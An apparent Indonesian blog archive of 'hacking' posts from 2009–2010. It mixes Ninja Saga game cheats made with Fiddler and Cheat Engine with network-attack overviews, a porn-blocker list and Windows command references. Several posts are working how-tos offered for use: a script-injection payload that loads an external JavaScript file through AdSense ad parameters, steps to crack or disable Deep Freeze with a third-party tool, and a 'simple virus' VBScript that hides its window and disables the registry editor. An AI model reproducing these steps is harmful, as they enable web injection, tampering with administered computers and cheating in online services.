Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Minggu, 19 Desember 2010

Cheat Gold, NPC and Reset Point

Bookmark and Share

Fitur :
  • Cheat Gold 100 M (100 juta)
  • Recruit NPC
  • Reset Point
Peralatan :
Caranya :
  1. Download dulu fiddler
  2. Kemudian Install Fiddler
  3. Buka Ninja Saga kamu, tapi jangan pilih karakter dulu (jangan buka fiddler !!)
  4. Baru jalankan Fiddler
  5. Klik Tab AutoResponder (yg icon-nya petir hijau)
  6. Centang kotak "Enable automatic responses" dan juga "Permit passthrough for unmatched request"
  7. Jatuhkan .SWF File yang kamu download tadi ke kolom AutoResponder
  8. Setelah itu bersihkan chace
  9. Baru pilih karakter yang akan kamu mainkan
Cara Menghapus chace :
  • Untuk Mozilla Firefox : Tools -> Options -> Advanced -> Pilih Network Tab -> Clear Now -> Klik OK
  • Untuk Google Chrome : Pilih icon yang berada di pojok kanan atas (sebelah bintang) -> Options -> Under the Hood -> Clear Browsing Data -> Empty the cache -> Clear Browsing Data
Info :
- Daily Task harus 4/4 atau 6/6 tapi JANGAN di CLAIM !!
- Jika ingin recruit NPC pergi ke SHOP, kemudian tinggal di buy

NB : DILARANG MEMPERJUAL BELIKAN CHEAT !!!!!!!!!!!


Credit To : Faro
Regard To : Ryuzaki

Selasa, 14 Desember 2010

JENIS-JENIS TALENT NINJA SAGA DAN EFEKNYA

Bookmark and Share


Talent Ninja Saga
Eye Of Mirror Skill mata kuno yang memberikan pemakainya penglihatan yang kuat dan memberikan persepsi, tetapi skill ini juga membawa efek negatif yang sangat besar bagi fisik pemakai.

Skill 1 : Eye Mirror Kemampuan mengcopy skill musuh.. tapi kesempatan untuk berhasil sangat rendah yaitu cuma sekitar 1% tapi dapat ditingkatkan kesempatannya dengan meng-upgrade level skill Eye Mirror dan juga tergantung dari jumlah CP. Skill lv 1 : Kesempatan berhasil 1% Skill lv 2 : Kesempatan berhasil 1.4% Skill lv 3 : Kesempatan berhasil 2% Skill lv 4 : Kesempatan berhasil 2.8% Skill lv 5 : Kesempatan berhasil 3.8% Skill lv 6 : Kesempatan berhasil 5%


Skill 2 : Crescent Eye of Mirror Kemampuan untuk membalikkan genjutsu ke musuh (tidak berlaku untuk skill talent).

Skill 3 : Mirror of Passion Mengurangi HP musuh sebanyak 0,5% selama 7 kali putaran, untuk skill level selanjutnya mengurangi 0,6% HP musuh selama 8 putaran

Skill 4 : Mirror of Grace Memberi efek restriction dan chaos dengan kesempatan berhasil 25% (chaos kemungkinan effek yang membuat karakter kita binggung) selama 2 putaran dan mengurangi damage serangan yang diterima sebesar 100%, pada skill level selanjutnya kesempatan berhasil meningkat menjadi 30%.

Skill 5 : Mirror of Strenght Meningkatkan damage hingga 160% selama 3 putaran.. Jika berhasil mengenai sasaran, ada kesempatan membuat musuh stun..

Skill 6 : Mirror of Freedom memulihkan HP dan CP sebesar 5% setelah HP menjadi 0 (Besar HP dan CP yg dipulihkan bergantung level jutsu).


Deadly Performance Talent ini dapat menyebabkan buff negatif/efek - efek negatif pada lawan selama pertarungan. Pengguna berpengalaman dapat menggunakan lebih banyak mayat hidup pada saat yang sama.

Skill 1 : Onmyouji: Wondrous Doors mengubah 5% - 20% (bergantung level jutsu) damage serangan yang diterima menjadi HP

Skill 2 : Samurai: One Sword memberi efek bleeding 5%-16% (bergantung level jutsu) selama 3 putaran dan mengurangi dodge lawan sebesar 10% - 20%

Skill 3 : Soul of Onmyouji Mengurangi damage yang kita terima sebesar 1,5% - 2% dan ada kesempatan untuk mementalkan efek serangan stun dari lawan

Skill 4 : Soul of Samurai ada kesempatan kurang lebih 5% untuk mengembalikan serangan dari musuh sebesar kurang lebih 15%..

Skill 5 : Burial of Dead Bone Membuat musuh tidak bisa menggunakan senjata dan jutsu untuk menyerang selama 1 putaran (bisa selama 2 putaran tapi bergantung level jutsu ini)

Skill 6 : Divine Wind of Onmyousamurai Mengubah 25% serangan yang dihasilkan menggunakan skill ini menjadi HP

Dark Eye Mengkombinasikan ketajaman mata dengan skill akupunkture yang dapat melihat kelemahan lawan dan dapat menyerang titik meridian lawan.

Skill 1 : Dark eye menambah kesempatan dodge dan akurasi, sesuai level skill.

Skill 2 : Acupuncture Needle Barrage mengurangi maximum CP musuh, pengurangan max cp bergantung pada level skill.

Skill 3 : Acupuncture Meridian Anestesia mengurangi serangan yang diterima sebesar 5,8% (tergantung skill level) menambah hp 2,8% tidak dapat charge cp selama 2 turn

Skill 4 : Meridian Search menambah kesempatan critical sebesar 1% menambah damage critical sebesar 3%Skill 5 : Meridian Strength menambah max CP sebesar 10% Menambah pemulihan CP sebesar 12.5% ketika menggunakan charge.

Skill 6 : Acupuncture Meridians Destruction Memberikan efek restriction pada musuh selama 2 turn, dan 14% kesempatan menghilangkan skill suportive musuh/buff.

Eight Extremities Talent ini terfokus pada fleksibilitas 8 bagian tubuh, dan mengandalkan taijutsu. Kekuatan yang meledak - ledak bisa didapatkan ketika dalam mode Extreme, namun memiliki efek samping dalam pemakaiannya.

Skill 1 : Soul Punch Damage : LV x 420% CP : LV x 200%

Skill 2 : ?? menambah damage taijutsu sebesar 5.6% mengurangi HP yang dibutuhkan saat melakukan skill taijutsu sebesar 50%

Skill 3 : ?? Menambah agility dan max HP sebesar 2.8%

Skill 4 : ?? menambah semua skill damage taijutsu sebesar 40% pemakai tidak dapat menambah hp/heal selama 3 turn

Skill 5 : ?? 14% kesempatan mengurangi 50% CP musuh

Skill 6 : ?? 42% kesempatan membuat musuh mengkonsumsi CP 2x lebih banyak dari yang dibutuhkan dalam memakai skill.



Cheat Level Auto XP [Permanent.. !!!]

Bookmark and Share

Alat Alat :
-Fidler2
  Download di : http://www.fiddler2.com/. Gratis kok, gak pake bayar
-Swf nya AutoXP
  Download di : http://www.ziddu.com/download/12976951/ninja_association.swf.html, Gratis juga..

- Klo dah siap di download buka browser, buka ninja saga
- Buka fidler yang uda di instal, klik cache(di bagian atas kiri)
- Setelah selesai klik "AutoResponder".
- Lalu Drag aja file SWF yang uda di dowload tadi ke dalam AutoResponder tadi..
- Trus kembali ke ninja saga.
- Masuk ke Headquarters.
- Pilih Token Gold
- Masuk kan jumlah xp yang anda mau, nnti level nya akan kelihatan.
- Setelah itu tunggu sesuai level yang anda ingin kan sambil tidur".
- Saya saran kan klo nunggu nya harus sambil minum kopi..
jadi lebih mantab.. :D

Hack Gold Ninja Saga [Permanen]

Bookmark and Share

Langkah-langkah yg hrus di lkukan :

1. Buka Ninja Saga
2. Kalau Daily Task muncul Friend Recruit, segera refresh kembali Ninja Saga (Karena Daily Task dapet gold, jarang dpat kalau reqruit friend)
Sebaiknya tunggu sampai dapet 4 Mission Complete, karena aq sering dapet gold dari Daily Task ini
3. Setelah Daily task siap di claim, refresh kembali NS anda.
4. Masuk kembali ke Character anda dan jangan dulu Claim Daily Task anda
5. Buka CE (sebaiknya terbaru)
6. Scan jumlah Gold anda, Scan type : Exact Value, Value Type : 4 Bytes, centangin ASROM (Also Scan Read-Only Memory)
7. Setelah dapat addressnya, double klik addres tersebut, dan akan muncul di kotak bawah
8. Biasanya address yang di dapet ujungnya adalah 78, sebagai contoh, gold gw sekarang adalah 15638680, apabila di scan akan muncul 08544F78
9. kemudian ganti addressnya t --> change record --> address
10. Ganti alamat diatas dari 08544F78 menjadi 08544FAC (yang 78 diganti menjadi AC) --> klik OK
11. Secara otomatis value address tersbut menjadi level anda (dalam hal ini level saya 46)
12. Kemudian klik kanan kembali address tesebut --> change record --> value
13. Ganti angka level anda tersebut menjadi 75000 (pengalaman gw dapet jadi 13 juta gold, 12000 dapet 2 juta gold, 34000 dapet 5 juta gold) --> klik OK
14. Kembali ke Ninja Saga, Tunggu sekitar 1 menit-an, kemudian claim reward anda....
15. Kalau anda mendapatkan EXP, maka otomatis akan Error, tapi kalau anda mendapatkan Gold, maka gold anda akan menjadi 13 JUTA GOLD dan permanen


Kalau mendapatkan EXP berarti anda harus nunggu 1 hari lagi ke depan

Sabtu, 24 Juli 2010

Hacking Adsense (Memanipulasi Klik Pengunjung)

Bookmark and Share

Ok, begini langsung to the poin aja..
Awalnya begini, web gw walapun nggak punya PR tapi termasuk web dalam kategori trafic tinggi dalam kunjungan. Kebanyakan pengunjung bila gw lihat dari reffernya berasal dari situs google. Suatu hari gw iseng iseng masangin salah satu adsense dari indonesia. Yg buat gw heran neh, bila gw lihat hasilnya di earning selalu saja menunjukkan angka yang sedikit perharinya, padahal seperti yg gw katakan, web gw tuh termasuk web yang banyak dikunjungi. Dari log yg gw buat sendiri, paling sedikit dalam sehari ada sekitar 300 ip adress yang berbeda.

Gw betanya-tanya, masa sih dari sekian banyak pengunjung nggak ada satupun yang ngeklik iklan yang ada di web gw?????

Akhirnya dg sedikit nakal gw mengutak atik script yg diberikan adsense tsb, tujuannya cuma satu: gw ingin juga dapat mengontrol (melihat) pengunjung web gw yg melakukan klik di iklan pd web gw.
Gw lihat celahnya sangat besar untuk melakukan itu, karena adsense tsb dalam mengatur/mengkonfigurasi iklan yg ditayangkan tidak didasarkan pada database, melainkan pada paramater URL yang dihasilkan lewat javascript yg dibuat. Nah di parameter URL itulah gw sisipi script (istilah kerennya phising), yang inti cara kerjanya adalah : Bila link dalam adsense tersebut di klik oleh siapapun maka sebelum halaman web berpindah maka script gw dieksekusi terlebih dulu. Setelah script gw dieksekusi, maka dia akan memberitahu ke file php yg gw siapin sebelumnya lewat metode ajax. Isi file php tersebut hanya mencatat IP adres siapapun yg melakukan klik beserta alamat URL tujuan yang di klik. Di sini gw melakukan filter : tidak boleh ada ip adress yg sama melakukan klik atas alamat adsense yg sama.
Hasilnya ...???

Wauw.. sangat berbeda jauh dengan apa yg ditampilin oleh adsense tsb atas klik yg gw peroleh. Hahaha gw yg kena kibul atau gw melanggar aturan ya.....
Akhirnya gw langsung buang script dari adsense tersebut, untung di dia.. rugi di guwa lah kalo gini caranya terus terusan. Jadi begitu ya caranya, apa dipikir mentang mentang sudah ditaruh pakai metode iframe lantas kita nggak bisa mengontrol...???

oke, gini caranya nya: misalnya di URL yg dihasilkan script untuk mengkases iframe tertulis : httpx://xxxx.com?id=zcvdcasdcs&font=fffff&bacground=000000&border=0000C
->perhatikan bagian yg bold.
diakhir bagian yg di bold kita tambahkan : }</style><script type=text/javascript src=httpx://lokasi_script_gw.js></script><style type=text/css>

Artinya: bagian warna merah adalah untuk mengakhiri tag bacground=000000, warna biru adalah tag javascript dan menunjukkan lokasi dimana lokasi js kita disimpan, warna hijau adalah untuk meneruskan tag style css yang sebelumnya kita tutup pakai warna biru.

Tapi ingat, nanti dihalaman web kita nulisnya nanti jadi begini : }%3C/style%3E%3Cscript%20type=text/javascript%20src=httpx://lokasi_script_gw.js%3E%3C/script%3E%3Cstyle%20type=text/css%3E ..

Sementara sampe sini dulu, selamt mencoba

Jumat, 18 Juni 2010

Menambah Kapasitas RAM Tanpa Harus Menambah RAM

Bookmark and Share

Pasti anda kesel melihat komputer yang mempunyai kinerja lambat, apalagi anda seorang design graphic.. hehhe,, sama dong kita, saya juga kadang kesel sama laptop ram 1gb ni, Hingga pada suatu waktu saya sedang main di kaskus ternyata ada cara untuk menambah kapasitas RAM dengan Flasdisk.. ya benar.. hanya dengan menggunakan Flasdisk.

Penasaran gimana caranya..?
Langsung saja, di sini kita gunakan sofware yang bernama EBOOSTER.

Software nya sendiri bisa anda download di sini. Pilih aja salah satu, saya saran kan file yang paling besar karena mungkin lebih lengkap.

Cara penggunaan eBooster cukup mudah:
1. Install eBooster di komputer anda
2. Restart Komputer
3. Setelah di restart, colokkan flashdisk ke slot usb komputer anda, maka akan muncul tampilan seperti dibawah ini, Pilih flashdisk anda sebagai device yang akan digunakan sebagai RAM tambahan, setelah itu klik OK.


Gampang kan..?. Dengan ini anda tidak perlu membeli RAM yang harganya cukup mahal (yah mungkin bagi saya)..
hehhe..

Rabu, 19 Mei 2010

Teknik Yang Sering di pakai Hacker Untuk Menembus Database

Bookmark and Share

Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:

1. IP Spoofing

2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks


1. IP Spoofing


IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.


IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.


2. FTP Attack


Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.


Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.


3. Unix Finger Exploits


Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.


Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.


4. Flooding & Broadcasting


Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.


Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.


5. Fragmented Packet Attacks


Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.


6. E-mail Exploits


Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).


7. DNS and BIND Vulnerabilities


Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).


8. Password Attacks


Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.


Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.


9.Proxy Server Attacks


Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.


10. Remote Command Processing Attacks


Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).

Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack


Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.


12. Selective Program Insertions


Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.


13. Port Scanning


Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.


14.TCP/IP Sequence Stealing, Passive Port Listening and Packet


Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.


15. HTTPD Attacks


Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.


HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.

Kamis, 06 Mei 2010

Hacking Semua Versi Deepfreeze

Bookmark and Share

Sesuai dengan judul nya.. saya mau membahas soal hack deepfreeze.. Uda tau dong deeffreeze apa?
yah klo gak tau googling la.. karena saya gak bahas soal itu..
saya hanya bahas gimana cara menembus nya..
sehingga kita bisa melakukan hal yang ehhem.. ehhemm.. :D

catatan terpenting adalah software yang saya gunakan ini bisa di pake untuk segala jenis versi deepfreeze.. dan setau saya masih versi 6 lah yang paling baru..

Langsung saja..

1. Download software nya..
    di sini saya menggunakan Anti Deepfreeze download di sini
    http://www.4shared.com/file/9BLKtB8W/Anti_Deepfreeze6.html

2. Setelah di download tentu di jalan kan dong.. Sehingga tampil gambar seperti ini :


3. Pilih Versi DeepFreeze yang sesuai – Klik Apply.
Yang perlu diperhatikan adalah… Ketika kita klik pilihan Apply, maka Software ini akan menjalankan sebuah file yang disimpan pada Drive C, pastikan sebelumnya jika Anda menggunakan AntiVirus Avira, Avira tidak dalam keadaan aktif, karena jika aktif, file tersebut akan dianggap sebagai virus, maka Program ini tidak akan bisa dijalankan.

4. Setelah Program ini dijalankan, maka di System Tray, Icon dari DeepFreeze akan digandakan, tapi tampilannya lebih redup….

5. Perhatikan gambar berikut…

6. Yang boongan yang sebelah kiri. Itu yang dihasilkan dari Software Anti DeepFreeze tadi
7. Klik 2x Icon yang baru dengan menekan Tombol Shift (Shift + Klik 2x)
8. Makan akan tampil pilihan seperti berikut ini:


9. Biarkan Kosong untuk Password – Langsung saja Klik OK
10. Akan tampil pilihan berikut ini:



11. Untuk memilih dan memasukkan Password yang baru, kalian pilih tab Password diatas, masukkan     
      Password baru dan Konfirmasi. Lalu Apply dan Reboot…
12. Atau jika kalian hanya ingin melumpuhkan DeepFreeze saja, bisa kalian klik pilihan Boot Thawed lalu klik Apply and Reboot.
13. Lalu Restart secara otomatis, dan lihat perubahaannya…
14. Menakjubkan…
15. Semoga bermanfaat untuk hal-hal yang Positif…

Senin, 26 April 2010

Software Untuk Memblokir Situs Porno di Komputer Pribadi

Bookmark and Share

Jika anda seorang yang sangat membenci pornografi.. atau komputer/ laptop anda seirng di pakai secara masal oleh keluarga dan tidak ingin keluarga anda melihat situs porno,, mungkin anda harus memblokir nya utuk menghindari hal hal yang tidak di inginkan. Salah satunya dengan cara  memblokir nya..

Ada dua cara untuk memblokirnya.. dengan software atau tanpa software..
Karena menggunakan software lebih mudah, dan saya juga lebih mudah menjelaskan nya.. di sini saya kasi beberapa software yang mampu memblok situs porno.. gunakan nya cukup gampang..

langsung cek aja..
  1. Anti Porn
  2. Mampu memblokir situs ataupun konten, termasuk tidak menampilkan gambar yang dianggap berbau porno dan menggantinya dengan gambar antiporn
    Download Anti Porn Here
  3. Naomi
  4. Program ini dapat disembunyikan dan tidak keluar apapun saat bekerja, tapi dia langsung menutup browser.
    Download Naomi Here
  5. Netdog
  6. Software ini sangat ringan. Cara kerjanya dia tidak menutup browser, tapi tidak mau jalan (tidak loading) saat browser digunakan untuk mengakses situs porno. Pemblokiran bisa dilakukan dengan cara menambahkan kata-kata(keywords) atau situs tertentu. Disamping dapat juga dilakukan pengecualian terhadap kata-kata dan situs tertentu.
    Download Netdog Here
  7. SitusiteBlocker
  8. Program ini tergantung pada database. Jadi jika anda punya data base yang banyak tentang web porno, maka akan lebih sempurna menghalanginya. Kelebihannya program ini dapat disembunyikan dan anda bisa set peringatan pesan sesuai yang anda suka saat digunakan untuk mengakses situs porno.
    Download SetupSiteBlocker Here
Tapi sepertinya kalau gak ada situs porno, kayaknya bakal kurang seru nich dunia internet. hehehehehe.... So buat yang baca tulisan saya ini saya ucapkan banyak terima kasih. Dan selamat mencoba, semoga informasi ini bermanfaat bagi kita semua.... Peace!!!!!!!!

Selasa, 09 Februari 2010

Membuat Virus Sederhana

Bookmark and Share

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"


Minggu, 07 Februari 2010

30 Situs Paling Berbahaya Di Dunia

Bookmark and Share

Berhati-hatilah dalam browsing atau membuka situs-situs tertentu yang belum jelas. Karena di dalamnya bisa mengandung virus-virus berbahaya yang akan meugikan kita. Berikut adalah situs paling kotor di dunia, di situs tersebut banyak terdapat bermacam-macam virus yang menyebabkan hp/pc anda rusak. Silakan menyimak :

Tips Agar Flashdisk Kebal dari Virus

Bookmark and Share

Bingung dengan flashdisk Anda yang sering terkena virus?

Anda bisa mencegah flashdisk Anda terkena virus dengan melakukan beberapa trik mudah berikut ini :
1. Masukkan flashdisk ke port komputer atau laptop
2. Buat satu folder di drive flashdisk Anda.
3. Beri nama folder tersebut dengan nama autorun.inf
4. Buka folder tersebut, dan buat aplikasi Notepad di dalamnya di Start->All Programs->Accessories
5. Beri nama file sembarang untuk file Notepad tersebut
6. Buka program Character Map di Start->All Programs->Accessories->System Tools
Pilih huruf yang berlabel Unicode, seperti Arial Unicode atau Lucida Sans Unicode, atau huruf Jepang, China dan karakter aneh lainnya.
7. Pilih beberapa karakter, bisa 4 atau 5 buah, lalu tekan Ctrl+C untuk copy karakter aneh tersebut
8. Rename file Notepad tersebut atau tekan F2 , dan paste karakter aneh yang sudah di-copy tadi untuk mengganti nama file Notepad tersebut
9. Nama file Notepad akan berganti menjadi karakter aneh atau kotak-kotak, dan selesai.

Dalam system operasi Windows, tidak diperbolehkan terdapat 2 nama file yang sama, sehingga kemungkinan besar virus tidak bisa memakai nama file autorun.inf tersebut. Jikalau virus ingin menggantinya, rata-rata virus belum mengenal karakter Unicode, sehingga tampak sulit untuk mengubahnya, dan flashdisk Anda pun aman dari virus.

Sabtu, 05 Desember 2009

Route.exe

Bookmark and Share

Manipulate network routing tables. Route packets of network traffic from one subnet to another by modifying the route table.
Syntax

Display route details:
ROUTE [-f] PRINT [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Add a route:
ROUTE [-f] [-p] ADD [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Change a route:
ROUTE [-f] CHANGE [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Delete a route:
ROUTE [-f] DELETE [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

key
-f Clear (flush) the routing tables of all gateway entries. If this is
used in conjunction with one of the commands, the tables are
cleared prior to running the command.

destination_host
The address (or set of addresses) that you want to reach.

-p Create a persistent route - survives system reboots.
(not supported in Windows 95)

subnet_mask_value
The su

Senin, 23 November 2009

PATHPING

Bookmark and Share

Trace route and provide network latency and packet loss for each router and link in the path. Combines the functionality of PING and TRACERT.
Syntax
PATHPING [-n] [-h max_hops] [-g host_list] [-p period]
[-q num_queries] [-w timeout] [-i IPAddress] [-4 ] [-6 ][TargetName]

Key
-g host_list - Loose source route along host-list.
-h max_hops - Maximum number of hops to search for target.
-i address - Use the specified source address.
-n - Do not resolve addresses to hostnames.
-p period - Wait period milliseconds between pings.
-q num_queries - Number of queries per hop.
-w timeout - Wait timeout milliseconds for each reply.
-P - Test for RSVP PATH connectivity.
-R - Test if each hop is RSVP aware.
-T - Test connectivity to each hop with Layer-2 priority tags.
-4 - Force using IPv4.
-6 - Force using IPv6.
Pathping is invaluable for determining which routers or subnets may be having network problems - it displays the degree of packet loss at any given router or link.
Pathping sends multiple Echo Request messages to each router between a source and destination over a period of time and computes aggregate results based on the packets returned from each router.
Pathping performs the equivalent of the tracert command by identifying which routers are on the path.
To avoid network congestion and to minimize the effect of burst losses, pings should be sent at a sufficiently slow pace (not too frequently.)
When -p is specified, pings are sent individually to each intermediate hop. When -w is specified, multiple pings can be sent in parallel. It's therefore possible to choose a Timeout parameter that is less than the wait Period * Number of hops.
Firewalls
Like tracert PathPing uses Internet Control Message Protocol (ICMP) over TCP/IP. Many firewalls will block ICMP traffic by default. If an attacker is able to forge ICMP redirect packets, he or she can alter the routing tables on the host and possibly subvert the security of the host by causing traffic to flow via a path you didn't intend.
"The path changes, so too must the traveler" - Tarek Verena

All Dos Commands

Bookmark and Share

ADDUSERS Add or list users to/from a CSV file

ARP Address Resolution Protocol

ASSOC Change file extension associations

ASSOCIAT One step file association

AT Schedule a command to run at a later time

ATTRIB Change file attributes



BOOTCFG Edit Windows boot settings

BROWSTAT Get domain, browser and PDC info



CACLS Change file permissions

CALL Call one batch program from another
